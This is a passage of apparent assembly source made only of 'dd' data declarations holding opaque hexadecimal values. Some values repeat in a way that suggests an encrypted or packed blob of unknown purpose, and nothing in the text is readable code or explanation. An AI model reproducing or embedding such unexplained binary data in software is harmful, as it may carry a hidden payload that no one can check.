7B928827h, 0A44BE1ACh dd 7AD4813h, 6C3FDC62h, 0CBC07FD6h, 43FA8550h, 0C85613BEh dd 14D36C2Bh, 9D20C452h, 0D6EA20FFh, 7CE7B05Fh, 947F19A7h dd 2BCB5F09h, 0A427C18Ah, 888751FFh, 451FA668h, 0CA70058Ah dd 50D3763Fh, 0AE36F9B1h, 0C1BF58E7h, 7100B852h, 0D57E11DCh dd 0FA2BD25h, 897CE08Bh, 118149EAh, 576AA164h, 0C14428D3h dd 29CE9122h, 9F32E98Bh, 1F87501Bh, 6D0EC972h, 0C49435E6h dd 38D3892Ah, 845EE199h, 2EB27113h, 4E3FD867h, 0D99721C7h dd 44EFA33Eh, 0B84F1982h, 8CE753Eh, 9D15AC47h, 0E28F12EAh dd 46EDB545h, 0B47F33CEh, 2BC06930h, 0B524CB97h, 0CFE27DEEh dd 4F2CA04Bh, 0DD7F19AAh, 3FCC6A17h, 9C23F184h, 0C1B45BE7h dd 791D8026h, 0D26328DAh, 31D09D24h, 817794AFh, 1DBB7AF6h dd 560C8B69h, 0A86730DFh, 2EFF8401h, 0BD5EE5A0h, 0BA4533h dd 4905D27Fh, 0C58A1BAEh, 57E0BC28h, 0A359E1BDh, 7B04C76h dd 7329D16Dh, 0F1B47E95h, 30FE974Ch, 0AB4D0E86h, 53C9670Bh dd 8037E234h, 0F5B944EAh, 44EB9A42h, 0B46E35ABh, 2DD06514h dd 0B139C18Ah, 0FC876F96h, 4516BD68h, 0DD7F0592h, 35C6575Eh dd 0BB42EC93h, 0E5AE47F7h, 751B984Bh, 0F66530DBh, 1CC7903Fh dd 0E05FF987h, 19BF42D3h, 7503926Eh, 0EE6413C1h, 40FF9827h dd 0AC40E5B0h, 31A6450Bh, 6B0DD07Ah, 0C98803AEh, 51D48932h dd 9E2AE1B2h, 2A65D02h, 502EC77Bh, 0F18425D4h, 55ED8152h dd 0A34D28A5h, 2EBA7A0Bh, 9D20EF72h, 0D68F30FFh, 28E7B05Fh dd 0B2590080h, 3DC66D03h, 9325D6AEh, 88914FF3h, 5239A060h dd 0DD660DA3h, 33C5760Eh, 0AD31EF93h, 0F49434F6h, 7917BE65h dd 0D55901CAh, 27CB8835h, 94749480h, 19B75EC5h, 633FA16Ah dd 0DA522ED3h, 33FF9721h, 0AC7C8C95h, 26BA4533h, 4715D97Fh dd 0C39F07C8h, 56FD8532h, 9F5ECADEh, 2EAC7906h, 3FD867h dd 0E8BD38E8h, 42DA8A5Bh, 0BB471FB9h, 0BD5401Dh, 0B652C263h dd 0F59A0BEAh, 4BE78F58h, 0AE751DBAh, 8C64266h, 953ECB8Ch dd 0E1B448F5h, 410FA05Ch, 0D57721AAh, 50D37631h, 9D13E8B8h dd 0C9A346EBh, 6A1DAA48h, 0D97E05D3h, 27F69239h, 0E054F185h dd 0A8558C8h, 460FB077h, 0DD762EDFh, 25D7982Fh, 0A140E38Bh dd 1CBE767Eh, 6B0BD243h, 0F39F30C1h, 56FB9E32h, 9145D0B9h dd 3BAB6F18h, 6E33C67Ah, 0CBA54CC1h, 51FEB77Fh, 0B85708A4h dd 0FD6776Eh, 9721C975h, 0E48F2FFDh, 46EDBF36h, 0B47911A0h dd 2CD76B66h, 8439CB96h, 0E98C45F4h, 527AB143h, 0B8640FA3h dd 34C4612Dh, 8B2DEFF6h, 80AE51E5h, 7D06A26Fh, 0C46F0ACCh dd 3BCD9015h, 8E5BDC8Bh dd 78B740E2h, 751EAA57h, 0DC6732C4h, 3EE9109h, 0BD5CE289h dd 14AF501Dh, 7C03C845h, 0CEB354CBh, 56E08932h, 0A065F0BBh dd 68837213h, 652EDA47h, 0EC9722D4h, 5EEF9471h, 894E0E83h dd 14D45D6Eh, 9D3CDE63h, 0F18F16EAh, 44EB9A52h, 845B74ABh dd 11E24D30h, 0B46496CDh, 0DAE270DAh, 4C39B34Bh, 0F3771FA9h dd 2AA7D3Bh, 980DFB93h, 0E5915AEBh, 590A895Fh, 0D76F36BEh dd 3AC78907h, 8C5BC297h, 9749F3h, 7538C45Fh, 0DC670FD1h dd 35F69518h, 994AC983h, 86F9727Eh, 5E34BE7Ch, 0A1908025h dd 20E01314h, 0A0BF7B88h, 0E3C22A49h, 560CE2CAh, 0E80D1AF6h dd 0EE1F1B26h, 4B224AEDh, 0A2E404AAh, 0B1DFAC0Eh, 0C1226F65h dd 2882DC5Eh, 0E456F926h, 32B26665h, 0A31AF5FBh, 446939FCh dd 70AE5F7Eh, 0E9520692h, 0C555570Ch, 0E874A0F0h, 7FD6F00Dh dd 2E4EC2B3h, 0B8CEE7BEh, 5C377195h, 0D33AA2D5h, 2AD2464Fh dd 226AF476h, 0F9C6D7B6h, 10DA9E1Fh, 5B2AE6B7h, 1A9E2CBEh dd 9D9DEC18h, 0A0CC68ACh, 0BB228C5h, 0DFEA010Ch, 0B235DEEFh dd 0C3989756h, 700D7FF1h, 0CF751BFFh, 0C887F8D9h, 8EA146Eh dd 0F852DC0Fh, 90809015h, 68E810BDh, 0D01A74A6h, 0AB06666h dd 0F922A494h, 0E2E23CE6h, 7029852Eh, 83E4F939h, 9F50468h dd 0D3040909h, 7F5F34B8h, 95F9BD52h, 0B03C71C2h, 0DD2FF0B5h dd 0E00C84EEh, 2B85FD85h, 95E116E1h, 0A8346754h, 67617BC3h dd 0F3DA8CE6h, 0FB35DB81h, 3E594693h, 0E875D9AEh, 0D092EC6Eh dd 2FD57BC4h, 532499FDh, 8FD7B438h, 98F264E9h, 0CF75EDD6h dd 22A7F729h, 0E5BA2255h, 7572D8C6h, 90C21811h, 0D6763436h dd 45918B31h, 58843794h, 0FB3E647Bh, 0A08BB31Bh, 0FF92D42Eh dd 33ED9338h, 5695B99h, 0E8429C1Eh, 6D5B698Eh, 1844D736h dd 3587AD8Dh, 4894E2CBh, 0B16BC0BFh, 87837DD6h, 2651B68Bh dd 8C06DBB6h, 7BDC61B1h, 1A6F8CD0h, 989F247Ah, 862BC16h dd 9F17D5F3h, 5292DA5Dh, 0DABF0921h, 38C22A6Dh, 247A795Ch dd 1BF266A6h, 0F7ECE8FAh, 0FE392C53h, 0A79AD96Eh, 0CE49FE83h dd 0BAEA609Eh, 42418136h, 0C9F22CD4h, 0D5B20C66h, 0EE0C5BCh dd 4B12495Fh, 1C1A4147h, 3C176CF0h, 0D9E80C56h, 0DE7EFC63h dd 4338C38Eh, 18722473h, 315764BEh, 7EB965BBh, 84A71FEEh dd 0FBD21ABAh, 1062E062h, 0A8BBD8B9h, 0AC1BF44Eh, 0D8328EEEh dd 71CE4C2Ah, 9D9DBC16h, 0A0CC6F34h, 0BC1F10CDh, 0D02B80FAh dd 68A84C76h, 5AB0E6h, 0CAA01AA6h, 0A575B33Eh, 0C8144740h dd 0F737DD5Dh, 0F852AD02h, 928015CFh, 4083B667h, 801A74CEh dd 3A27F334h, 664A92C5h, 0D396CA13h, 2412807Eh, 0EF126CC7h dd 708EB0A1h, 17429CF4h, 0B6E6761Bh, 0D8F79526h, 0A4E972CAh dd 22767706h, 0B76BC6EEh, 0A247D3D0h, 496AF225h, 78779C33h dd 60F0B18h, 5532BADDh, 27986029h, 853AF87Ch, 0A0FB5039h dd 0F8A14746h, 237394B4h, 38924CDDh, 500AE45Eh, 0F267B3F4h dd 0B18AD205h, 0C8207412h, 44CEEB6Eh, 0CAC7530Eh, 0C3EA72A2h dd 14B049C9h, 24774F8h, 66320C62h, 0B64BD1F4h, 9D9AB11Dh dd 3999D418h, 0A812F94Bh, 81A90468h, 6C9063A0h, 9F523B4Eh dd 1772CC27h, 0B00B743Ah, 729C7C56h, 607C849Bh, 0FCDD2CB8h dd 106AC51Fh, 0DD226236h, 7E1BB2BFh, 9F7CC5B6h, 0BF41660Bh dd 4763FAD0h, 0CAAB9A85h, 6BC4BD46h, 0EC001121h, 539B1C40h dd 0DFDFBBCFh, 15F24CA6h, 69475BBh, 0A02216D6h, 60BA1462h dd 6DADFF56h, 90DC78B4h, 2882D00Bh, 7F9F7BCEh, 0B1B20C66h dd 0F04AA44Fh, 0DAB20217h, 0A5758267h, 0B8126C63h, 0FCA2C2DDh dd 6C4D91CAh, 80DA3417h, 0EB07EC1Ah, 0BF305812h, 48A270D3h dd 0C03739EEh, 45F20CA6h, 640FA33Fh, 94AE23C3h, 0C1E6816Eh dd 0B0127398h, 1BF500Ah, 7861C297h, 0D5D57B94h, 0C7D52A2Eh dd 6A1B8BDEh, 68C23B66h, 0FF0856F9h, 0AEC98633h, 604AD73Eh dd 20722C86h, 60BA1467h, 9625C342h, 0F48B2BF2h, 12172336h dd 451A42F2h, 6B8478A6h, 94CF2D37h, 0D9E20AAAh, 2078D446h dd 0EE433D46h, 6E3FFB0Eh, 6542AACAh, 0B6C1A71Bh, 0D1419C26h dd 0E25A35EAh, 0DD5DAD07h, 0E00CAF9Ch, 87F62801h, 2651828Bh dd 28C1A4B6h, 768F9FC3h, 1BCB8DE6h, 71A02514h, 7B9D8FE9h dd 20EFABAAh, 0ED2E4FBh, 8E5E85DEh, 32B6DCF3h, 0D0D16F3Dh dd 0C8F14715h, 873F6902h, 43224ACBh, 60BB18D4h, 0F0D82706h dd 93EA449Fh, 4849F7CEh, 66E9BF45h, 1FB77807h, 0DEA1511Ch dd 0DBEDFB15h, 0AB2D18A5h, 0D2463C12h, 3AF8551Eh, 0EED76309h dd 0BDA02B2h, 2E49B6ABh, 0BCCEE7BEh, 0A121337Dh, 8A3D53E9h dd 0F1D2C486h, 43A9C751h, 0FF561AF9h, 1CDFA60Fh, 0AA51E5ABh dd 16A55711h, 6135E062h, 0D79530C0h, 4DD1B035h, 0BE4FF6ACh dd 1AA74A02h, 6E35DD7Dh, 0E88A09FAh, 55F88B52h, 0A9767CA4h dd 14DF731Ch, 8C21C34Eh, 90EA469Eh, 0A7F08966h, 0A3681D1Eh dd 31C82202h, 8064C29Bh, 0C1AC3CFAh, 455A9F6Dh, 0D06118AAh dd 5ADB7626h, 0BA07CFA3h, 0CF9056AEh, 3E52826Fh, 0C4780DC8h dd 0A0F7F623h, 0E03A94EEh, 0DB3FADDBh, 0D66AF200h, 9E173733h dd 0D565F44Eh, 0D804B778h, 4D5CCBFh, 837CD62Ah, 96C1021Bh dd 43EB546h, 0B600F1F0h, 753D22F7h, 0BDD7977Bh, 98C470FCh dd 678892B5h, 45871A73h, 568DC5EBh, 0FD72306h, 6AEA72A9h dd 0A4789ABFh, 71E18A80h, 0B37DEE67h, 0B554C9Fh, 0F461C369h dd 557EDC0Ah, 0B097AA93h, 50AA321Eh, 0E842941Eh, 0C39C678Eh dd 543E8808h, 1A9F9BBEh, 43A2CA6Dh, 732DE02Eh, 87812EECh dd 2651968Bh, 0DCC2D9B6h, 481F0A46h, 2732BAA6h, 0F422B7AEh dd 0E09D43E8h, 0A0FA54A5h, 67D1AA15h, 9404D791h, 97C2503Ah dd 36611E9Bh, 669BA4A6h, 0DE621BC1h, 37DD8323h, 56A8C5E3h dd 759B9F06h, 0A6AA401Bh, 79D38D36h, 914B249Fh, 0FE27F337h dd 184A92C5h, 88E23C9Dh, 723F877Bh, 0FC3C5EF5h, 0AFAA4812h dd 0DE793663h, 80D0DC8Eh, 6B05CC26h, 0DE6316CEh, 48E39A22h dd 0B2AF6BBEh, 0F1D21ABDh, 26519E9Bh, 253353B6h, 768385C3h dd 0B8B705E6h, 21CA1242h, 33C829E9h, 0C8695498h, 3892EC42h dd 0C9543153h, 0E59B1C40h, 3666F2B3h, 6D5DA4A6h, 0F7EC1BC1h dd 0FE3C1653h, 0E3EA146Eh, 0CE4CC0A3h, 567449Eh, 28B4C21Ch dd 0C170209Eh, 30E00C0Ch, 704AA4FCh, 0B4A8A969h, 0E0FFD418h dd 3530199Ch, 66B459D3h, 0EE28CEF6h, 9EB08103h, 4E26CC10h dd 0E25B34EEh, 74EC69A9h, 1F6294D8h, 4EEE6A13h, 77EF021Eh dd 0A8026A88h, 409AF8A6h, 9761DBE6h, 42F96F3Dh, 442EF838h dd 0A6FABAEh, 0AB92DA7Dh, 0D02A83B6h, 0BD779176h, 595A8216h dd 0A4E4F12Bh, 1A62E408h, 20DD8323h, 60BA1462h, 0B11CE551h dd 0BEBE01D0h, 28CE9072h, 0FBB0E131h, 98370C50h, 0F27F20F1h dd 0E0713C96h, 207AD42Bh, 0A101D94Bh, 0DDF30468h, 0DE7EAE4Bh dd 7429DC8Eh, 0A5F133D9h, 0B03C5888h, 5826F356h, 613A94ECh dd 78D3BC6Ah, 1102901Eh, 57025CB7h, 76A6E2DBh, 48F60DE6h dd 20CA247Fh, 808689Dh, 966FABFCh, 0BD92DA7Ah, 0DD5FDD1Eh dd 68D1941Eh, 0CACF4B0Eh, 73F27A9Dh, 5C3767DCh, 0C8224AC8h dd 0E5373D1Bh, 0F864B276h, 0B27FBBCEh, 0AD82EA0Ah, 499E7B0Eh dd 0D3B20C67h, 0F0C1A8BEh, 0D6D0C69h, 204CCA42h, 8675E900h dd 3AAB0468h, 8243F6F6h, 0AE4FCB8Ch, 9B72FA1Ah, 34059B46h dd 48A2FD36h, 88AF197Dh dd 12D21A98h, 0EF39960Eh, 9E3E4223h, 4F5A714Eh, 0D833CC63h dd 0F277A97Eh, 0B9628A08h, 5AD3BCA6h, 0ACFA13B9h, 8E2A84DEh dd 5C4BFA5Dh, 95A5E02Ah, 98C47704h, 2E1A59B3h, 0C9937CE0h dd 9F401E86h, 85C721F9h, 0FAEA7280h, 2896B436h, 934874CEh dd 64989999h, 0B4C7A4C8h, 1D6F28B2h, 204C942Ah, 0B2A46396h dd 448E40D5h, 0EA4A7C37h, 0CAC835C4h, 1B38DE24h, 0B82E20B5h dd 89AD1DD6h, 0EB6B9C0Eh, 87C208C2h, 0ADE7942Ch, 0A83460DEh dd 409AE8A6h, 0EE1CA9E6h, 50E40406h, 2D589C38h, 98D4718Bh dd 18EAC93Eh, 9A20F7FBh, 488C5539h, 95A5E30Eh, 98C477FCh dd 302620BFh, 0C8487CD6h, 9FE9433Eh, 0CE6E8693h, 1467CF9Eh dd 4282EA23h, 0AB0197CEh, 0B0E301AFh, 0F04AA4FBh, 828619B0h dd 0B585832Eh, 0B824579Ch, 0A6C0DDh, 0EF2A971Dh, 0DDA348Eh dd 2E6C5A9Bh, 4F5933BEh, 7E9ED6C3h, 9EFA11EEh, 1067A1D2h dd 936AF222h, 9E17D813h, 0CD17F44Eh, 0D804B281h, 70A0EA55h dd 0F731EA47h, 96C6723Bh, 386A6F46h, 5BBBABA0h, 779188h dd 0B05A8232h, 0ED5CBEABh, 2762842Eh, 0A9DD832Ch, 6959031Ch dd 1353DB8Bh, 0BB25CF74h, 403F51F8h, 331A42F2h, 0B3458BC2h dd 65B5F747h, 88D4008Ch, 351169AEh, 0CC136CF0h, 259A6C74h dd 7DBD9CF6h, 80EC0F44h, 261571A6h, 0C40A6488h, 24273B47h dd 0E03AA2F0h, 0BED22C86h, 2654A39Bh, 0A0EB5CB6h, 87650BB0h dd 0EE27F863h, 70CA247Eh, 0CA0E196h, 0EFF059AEh, 57FD8266h dd 0B645A4B0h, 0EAB7056h, 4F7A956Bh, 0F59B3886h, 5FFEC45Bh dd 0A4471FF6h, 1C8760Bh, 0F573C972h, 0B0CA6494h, 8CDFC16h dd 0AD7701BDh, 3F927E03h, 952ED69Fh, 82EF1DF8h, 4516B17Ch dd 0DD7E18A8h, 29C6772Dh, 9823F4D6h, 0E1FA4DFEh, 7D52A848h dd 0D36F14C6h, 3CCC9D22h, 9449B4C2h, 11B642E7h, 3050A370h dd 0FF08519Bh, 28F9802Fh, 0F855E28Fh, 50A6481Fh, 281BDD72h dd 809E3ACFh, 50F58528h, 0B60AA8AAh, 0EE26E19h, 6E3FDD7Ch dd 0D1D23FC2h, 59EB931Eh, 0C22F46A2h, 12DF7C39h, 8A338C63h dd 0FF9364FBh, 4EA2F043h, 0AE7F1DBCh, 788D7F02h, 9527CBBDh dd 0FCAB1CB7h, 9BD0Eh, 0DD7F05B2h, 24E3247Fh, 8462EFD1h dd 0A1BF40EFh, 28B54822h, 0FFDE1EBDh, 5804E87Fh, 8054EB41h dd 0B04DE086h, 5CC865B6h, 6A6E90EAh, 0F9B8909Eh, 0C651CFC6h dd 70CA247Eh, 862BC16h, 0A0FA54AEh, 3892EC46h, 0D02A84DEh dd 68C21C76h, 5AB40Eh, 98F24CA6h, 308AE43Eh, 0C8227CD6h dd 60BA146Eh, 0F852AC06h, 90EA449Eh, 2882DC36h, 0C01A74CEh dd 58B20C66h, 0F04AA4FEh, 88E23C96h, 207AD42Eh, 0B8126CC6h dd 50AA045Eh, 0E8429CF6h, 47B2AC01h, 0CCD74F46h, 0B00A5281h dd 777A59D5h, 0EF3A94D8h, 0F5C66F31h, 0A765DC4Dh, 78015AFDh dd 64BEB0C5h, 0AA3ECECDh, 78881F67h, 4AE9A865h, 0ACB87FBAh dd 74679CFh, 55A384E8h, 68F423AEh, 0C2D9B1E5h, 0F92BAE8Eh dd 0B88AE0FCh, 0FE061A53h, 60DEFC6Eh, 0E73AAC06h, 1DEA449Eh dd 1EA14FB3h, 0D8232DCEh, 98310012h, 0FBD46FAh, 0BEDD8813h dd 0F98D172Eh, 9C74E1C5h, 40490468h, 67BEEC09h, 8432B78Eh dd 85FB3AC4h, 0B03C472Dh, 3CA2C6D5h, 0E308BFEBh, 365F3CF4h dd 4E319CE2h, 0DC026635h, 0ABA80B4Ah, 0C84073E5h, 8F357396h dd 23AC97E9h, 96C58C23h, 7391B446h, 55A547EAh, 68F423CEh dd 3FEE31C9h, 98F24C90h, 0C62E43Eh, 43227CD6h, 5685A0EBh dd 0EC44406h, 8802BB61h, 0AB82DC36h, 0F625C073h, 50C70C66h dd 0D4453977h, 14093CA0h, 1FCE59D1h, 37D16CF0h, 6695BCDBh dd 5CD715F6h, 68DA02B1h, 1872CC25h, 3BC9AD8Dh, 48A27CC5h dd 0DD2C6EEh, 7B2DD378h, 26551C8Bh, 2BD45FB6h, 4F9AF834h dd 0D8338B62h, 60B0A77Eh, 0F5E6B316h, 2BFA54AEh, 0D0C2E004h dd 2FD57A16h, 571A9975h, 0C659B438h, 18FAC6F6h, 29FEE4C7h dd 0BC0C8556h, 9151546Dh, 7953E48Dh, 4F359B7Fh, 6C7B5DE9h dd 0B51A3882h, 9099558Ah, 0FFB05D7Dh, 88E28B19h, 58FBB22Eh dd 0B7205F38h, 50AAAFDBh, 0D2C1CAF6h, 0BDF418Eh, 1A99DC6Ch dd 41096E35h, 0B6D01407h, 55396B11h, 78E4135Eh, 68AA41B3h dd 2C86534Dh, 0BF9AF44Eh, 0EE0D5453h, 2522747Eh, 0B9D43E8h dd 96C58C2Bh, 0E0176346h, 0D32AB2E1h, 0EB913872h, 0DB69B6CEh dd 7BFAFAA9h, 1043642Ch, 0EC06BD85h, 44A63D6Ah, 0A376A02Fh dd 1103AFDEh, 9355D3CDh, 41240013h, 36F7A49Dh, 717CD025h dd 29D9656Dh, 0A154A0D1h, 0D30BA3Dh, 0D18C70F2h, 0B0AB0F0Dh dd 1C4407Dh, 409BB1DDh, 311C104Dh, 6D9DBAADh, 6134E00Fh dd 5DED1C7Dh, 0EF6CB0FFh, 9E3DE423h, 3173AF4Eh, 86CD7319h dd 99DEE6FDh, 0F79D42F9h, 0A490556Dh, 0CDA4041Eh, 45A27B21h dd 68F43A36h, 186B0C68h, 7C32AEA4h, 5668E63Dh, 9024167Dh dd 9F4F0F86h, 0F0902FF9h, 95809519h, 0DD8C346Eh, 3A9A8B31h dd 0E8B97F65h, 0B0CFA6AEh, 22E20AB0h, 4810F3C5h, 4292C69Eh dd 0E0B2715Dh, 1CAC74E7h, 8162CB71h, 9C72CC26h, 6107106Ch dd 0A36802B6h, 583F7F18h, 0F8D22C86h, 0D3D526B5h, 90B2C93Bh dd 97B1F478h, 2FF15611h, 46F281FBh, 862BC16h, 606F5BA6h dd 0CE990C87h, 0E612275Bh, 6EB71D76h, 25D3B968h, 1D045F4Dh dd 30BCDC9Dh, 0AE2409D4h, 8B9F2563h, 0F95FCA02h, 784122BBh dd 0D77D238Ah, 492E3745h, 6E8DC0F3h, 7890FFEh, 0BEDA9913h dd 207AD42Eh, 788763CEh, 0B800B85Ah, 17BD636Ah, 0BF0AA107h dd 9D84CC10h, 0B03C5C1Dh, 47A68957h, 0CB387FDFh, 8F118746h dd 2652619Bh, 0A8025CB6h, 0CABD8046h, 0EE0A1363h, 7B2AE57Eh dd 4DE9B170h, 584AFFC8h, 0A71766ECh, 112AB2E6h, 0FC70796h dd 0AB5C3D6Ah, 33948C95h, 5432F6D5h, 63227959h, 582591E4h dd 0A056AC30h, 3BF2A45Fh, 0C37E6CF5h, 2BA212EEh, 0B3196A66h dd 0A84ECEE7h, 7711C37Eh, 0F27E59D1h, 0DE1A8C07h, 366A8D5Bh dd 5841775Dh, 82B09E1Eh, 0EB94247Eh, 628E9B41h, 40C8CE22h dd 13E07CB6h, 0B22CD379h, 0D51E076Ch, 61769648h, 9BEE3EB0h dd 0D4464618h, 7CBEEE80h, 41676E8h, 6D11AD1Eh, 0F17911F6h dd 15C1716Eh, 0A929E4C6h, 0B0E739CDh, 6FF27A9Eh, 6B241BBh dd 0C8227CD6h, 0D0B960EEh, 7DA50666h, 90DC7C3Bh, 2082DC36h dd 95A273BAh, 0F3B2E0EDh, 55CF53B1h, 8BE20AAEh, 2F7BD42Eh dd 0B812BB42h, 0FA42B45Eh, 54FF155Dh, 30DA02B1h, 91D966CEh dd 8635A403h, 0ED270B56h, 0E33AA2D6h, 0CD22C86h, 0B5EF330Bh dd 0A8026A8Eh, 349BF44Eh, 26F364E3h, 997ADB81h, 8DE917BCh dd 0A0CC6B12h, 0F0B923CDh, 0EFEE3957h, 204B1C40h, 643D0CF2h dd 0AB597A59h, 0C72182FEh, 0FE1AD953h, 60BA176Eh, 0E5CD806h dd 0A6D2E71Bh, 2DF65C36h, 3FE43626h, 3CD5B499h, 0C3E18277h dd 7F495A56h, 164271ABh, 0B8126FC6h, 0A6FF705Eh, 0DE7A3F73h dd 85AFB48Eh, 0E78CD2CEh, 4DAE8C41h, 681203A9h, 1FC12206h dd 1EEBCF79h, 767F3BA6h, 23A9CD1Dh, 76A251DBh, 2FE07BE6h dd 70CA27BCh, 0E076C916h, 5F05A9D0h, 0A87AF3F6h, 0B6D57B25h dd 0ED7E3CEh, 8BF125A5h, 5C77C769h, 1B8AD201h, 346AF51Eh dd 581F9199h, 0F851AC30h, 0BE9E449Eh, 102759C1h, 0C01A74F8h dd 7AC60A66h, 0C8EF2109h, 88E23CA0h, 250FD52Eh, 47EF9E2Eh dd 0F52FF3A1h, 0E842AACEh, 0F4DE348Eh, 0E67F2423h, 35FD9B41h dd 4894C4F3h, 0E03A94EAh dd 1F3A3BF2h, 0A8953BE0h, 60FC9C9Fh, 80924CE5h, 60998892h dd 1721DC0Bh, 0ADE74BBDh, 0A8FA6296h, 4D92EC46h, 73970491h dd 68C22A4Eh, 3BB2F27Ah, 200DB358h, 0F9A3FC17h, 0F0BDD9DCh dd 847A1458h, 67F7A605h, 3BEA72A6h, 0A2286D86h, 0F622D74Bh dd 1802A666h, 0C8D521F4h, 0EE483CA0h, 0D7873696h, 8E2AC943h dd 50AA145Eh, 5845E8F6h, 38BC9EC7h, 0B3143053h, 83A08C0Eh dd 0F52B5796h, 0E00CAB46h, 4077A971h, 104AC428h, 0A1775CB6h dd 0C590ACFEh, 0D804B47Bh, 0F17242D4h, 0ADE74BD6h, 0E0FA6296h dd 4C92EC46h, 0F8EE04DDh, 505FB97Ch, 0AB3CB438h, 0A75EF12Fh dd 0C721E408h, 0FE1AD953h, 60BA146Eh, 485BD946h, 0D6F46CEh dd 8282EA0Eh, 0F8BFF139h, 58320C50h, 0FB3FA4FEh, 0DE88426h dd 204CECB0h, 0DE2F876Ch, 0A7B235E6h, 0DE7A3973h, 80DB348Eh dd 0A870B826h, 2EAF6E97h, 88A2CA6Eh, 4530970Ah, 78E41418h dd 0A80C6F78h, 2DF5AC37h, 40ACCCEBh, 0D8328EE6h, 0B87E260Bh dd 30FC191Ch, 0B9C5498h, 75A51CFh, 609284E8h, 0C3C21C5Eh dd 38FF31F9h, 98FA4C90h, 41FEE43Eh, 37DF4D3Eh, 0C53FE391h dd 0F8529A3Eh, 0E5EA449Ah, 223A6C3Dh, 0F622EB4Bh, 1559A666h dd 0C8EF2109h, 80E23CA0h, 310FD42Eh, 5891D4A0h, 6835A154h dd 43249CC0h, 6B70F4BDh, 31CAAA33h, 2FAF6EA6h, 88A2CA6Eh dd 4530970Ah, 78E41419h, 959D6F78h, 0A8346413h, 409AE44Eh dd 18B33480h, 0B44A270Ah, 97C7B61Eh, 0C6FA6296h, 0BD24E3EDh dd 0D01CBC7Dh, 9402F4DDh, 85AD4BF1h, 98C47403h, 708AE43Eh dd 989275A2h, 5827916Ch, 0FF8AC30h, 0A6D2E11Bh, 28A2DC36h dd 0B59CC4CEh, 0D5B60864h, 55C05AB1h, 88D4040Bh, 1FCA59A7h dd 13746CF0h, 25AFF8DEh, 68422CF1h, 2A9ACBC1h, 0E78EB5CEh dd 158F9341h, 48A2CA6Eh, 863A94AEh, 0DE34A3Eh, 7643701Ch dd 0A21AEC1Dh, 76A26BCBh, 0DBD24CE6h, 8C9ECCD4h, 80D243E9h dd 985FD159h, 0B892EC70h, 0D25F84DEh, 0CD489AC6h, 6C8C93h dd 6472E7C0h, 808D913Bh, 376DFCD6h, 4B52BE2Eh, 0FAD53FAh dd 0A6D2E11Bh, 2982DC36h, 701101CEh, 0C5370626h, 5A4A92C6h dd 3084337Dh, 857014ADh, 0B824545Bh, 511AAF38h, 4DC76B5Ch dd 80DA02B6h, 6D72CE26h, 158F9391h, 48A2CA6Eh, 953A90EEh dd 72129C9Ch, 26525B9Bh, 0CA7D6B6h, 819AC276h, 60549C06h dd 0C061A518h, 0B86A5716h, 3F7F5EEEh, 9292DA7Eh, 0E88F0129h dd 68C21C40h, 102FB406h, 7071F4C0h, 8144134h, 63447CE0h dd 685115DEh, 7D58E4B6h, 90DC7C00h, 8D072B9Ch, 0C01A42F6h dd 0E9B21C66h, 966FD18Bh, 821ABF2Eh, 16424A8Bh, 8BB90AC6h dd 0ED83AE9Eh, 0E874A346h, 0B87FB179h, 1872CC10h, 0AF7F649Eh dd 53498BE7h, 0F8332C88h, 404C898Ch, 0F4AAC428h, 36A756B5h dd 269AC276h, 688FA54Dh, 0FACA1241h, 0B8C736D7h, 0C6FA6291h dd 3ACA5CEDh, 0E612195Bh, 0ED35B676h, 6C8CABh, 99F24CA5h dd 0B57DC64Ah, 0C8144473h, 64BA146Eh, 7DA5BA73h, 90DC7C3Bh dd 2B82DC36h, 44F271BBh, 0B04DF39Ch, 0FB55E55h, 0B047B961h dd 207AD418h, 0BB6664C6h, 0A700CDEEh, 0DE7A3973h, 80DA348Eh dd 0A852B8A6h, 2D8F4EB9h, 89A2CA6Eh, 69378E0Eh, 7AD2088Eh dd 265259BBh, 0ABE69CB6h, 0EB9E30CEh, 0BE98ED56h, 7A2ADBC6h dd 3E5A21B3h, 575132AEh, 0EAA49C3h, 0D02AA4DEh, 9F916876h dd 3662118Bh, 98F24CA6h, 0C787901Eh, 0C8227F11h, 0D0BF606Eh dd 0BB90696h, 1D618315h, 28B4E39Eh, 8193B5E5h, 52EABC9Ah dd 0C672397Bh, 0D159696h, 204CEC8Bh, 0B8526CC6h, 0E8CC082Ah dd 6D485FA6h, 80EC0C13h, 0A014C6CDh, 15008441h, 4894C4CBh dd 65CD3F88h, 78E41423h, 116AC41Dh, 2DF52FC2h, 40ACCCEBh dd 0F8328CE6h, 0B73D290Ah, 862BC15h, 304A51DAh, 0B36107ECh dd 10AF0F11h, 43C22A49h, 0FC123DC6h, 1D058595h, 30BCDC9Bh dd 0C8A27CD6h, 0E5371A1Bh, 0F864949Bh, 10AA4C14h, 0D0F1DFCFh dd 84D77043h, 99B21C42h, 7BFAAC1Eh, 0EEE4DF3Dh, 46BAE596h dd 37AA0A6Dh, 50126CDEh, 9409CF6h, 2B829FE8h, 1E0705A3h dd 703BDCD8h, 8B125730h, 50BF1944h, 8FD21ABEh, 2652619Bh dd 0A8025CB6h, 179C815Eh, 336A74CDh, 5899AF67h, 0D849443Dh dd 9F32D925h, 0AD93EC70h, 0D01CBB76h, 2C492577h, 0BDD3B02Ah dd 98C45CC1h, 0F2659B5h, 4D097CE0h, 608C2BC6h, 0C0F729F1h dd 90AA44A8h, 2AF6DC36h, 2B1AC39h, 0FE40C62h, 0CFAA197Dh dd 87E23CA0h, 207B0DAAh, 0B81F84C6h, 15E1045Eh, 0A407D2A4h dd 0C4F406BDh, 0E772806Ah, 8631F62Bh, 0BC277556h, 0B33AA2D1h dd 7BEE740Dh, 38193BC6h, 40361F3Dh, 0BF6501AEh, 0E7E6196Dh dd 73912448h, 8DEBB054h, 0A0CC6B56h, 0B19AAE45h, 0E615785Bh dd 40B19776h, 0DA07F1h, 211A4CA6h, 0BB751BCBh, 0FE1DA86Bh dd 0CD52426Eh, 73AD53F3h, 0A6D5900Bh, 20C85736h, 0EB163ECDh dd 5D5B8FA8h, 0F12A2CF1h, 0CED3C96h, 207AD574h, 87CAD9C5h dd 0E5A90468h, 0E874A36Eh, 8F320822h, 18726EA3h, 0B44CE9BEh dd 773A797Dh, 0E63994D8h, 8DB8C4D6h, 0ADE93BE1h, 0A8346362h dd 7B91814Eh, 5B3D80A1h, 70CA2565h, 9D5BB0FDh, 0A0CC6B7Ah dd 399F6949h, 552984DEh, 68F423EEh, 0FF623568h, 64774383h dd 0BB8AE43Eh, 8B097E96h, 4D52445Ah, 0C1AD53F3h, 0A6D59023h dd 0CC07D336h, 0C31A74CEh, 6E8DD4E3h, 68CFA7FEh, 3E20AA9h dd 